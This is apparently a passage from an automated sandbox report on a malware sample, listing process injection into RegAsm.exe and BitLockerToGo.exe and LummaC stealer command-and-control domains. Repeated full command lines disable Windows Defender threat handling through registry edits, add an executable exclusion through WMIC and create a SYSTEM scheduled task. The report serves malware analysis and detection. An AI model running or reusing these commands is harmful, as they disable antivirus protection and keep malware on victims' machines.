Source: file.exe, Program.cs Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 260000 protect: page execute and read and write Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_03022129 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread, 0_2_03022129
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 260000 value starts with: 4D5A Jump to behavior
LummaC encrypted strings found
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: reinforcenh.shop
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: stogeneratmns.shop
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: fragnantbui.shop
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: drawzhotdog.shop
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: vozmeatillu.shop
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: offensivedzvju.shop
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: ghostreedmnu.shop
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: gutterydhowi.shop
Modifies Windows Defender protection settings
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Writes to foreign memory regions
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 56C000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 58B000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 593000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 5D9000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C32008 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2435008 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 260000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 261000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2AB000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2AE000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2BD000 Jump to behavior
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00478420 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle, 11_2_00478420
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 7916 -ip 7916
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 736
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 7916 -ip 7916
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 744
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 7916 -ip 7916
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 764
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 7916 -ip 7916
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 748
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7916 -ip 7916
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 984
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 7916 -ip 7916
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bMvfdBTccYfZYKRCwN" /SC once /ST 18:54:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe\" Is /mKdidL 385121 /S" /V1 /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0042E0AC AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid, 11_2_0042E0AC
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0053EF8E cpuid 3_2_0053EF8E
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 3_2_005611F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 3_2_005613F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 3_2_005614EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 3_2_005614A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 3_2_00561586
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 3_2_00561611
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 3_2_0055B6A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoEx,FormatMessageA, 3_2_005407DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 3_2_00561864
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_0056198D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 3_2_00561A93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 3_2_0055BB74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 3_2_00561B69
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: GetLocaleInfoA, 7_2_004051FC
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: GetLocaleInfoA, 7_2_00405248
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetLocaleInfoW, 9_2_004210E8
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 9_2_0042120E
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 9_2_00420A82
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetLocaleInfoW, 9_2_00421314
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: EnumSystemLocalesW, 9_2_0041931F
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 9_2_004213E3
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: EnumSystemLocalesW, 9_2_00420D6F
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: EnumSystemLocalesW, 9_2_00420D24
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: EnumSystemLocalesW, 9_2_00420E0A
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 9_2_00420E95
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetLocaleInfoW, 9_2_004197E4
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetLocaleInfoW, 9_2_020D9A4B
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetLocaleInfoW, 9_2_020E134F
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: EnumSystemLocalesW, 9_2_020E1071
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 9_2_020E10FC
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 9_2_020E164A
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: EnumSystemLocalesW, 9_2_020E0F8B
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: EnumSystemLocalesW, 9_2_020E0FD6
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 9_2_020E1475
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 9_2_020E0CE9
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetLocaleInfoW, 9_2_020E157B
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: EnumSystemLocalesW, 9_2_020D9586
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: GetLocaleInfoA, 11_2_00408570
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: GetLocaleInfoA, 11_2_004085BC
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
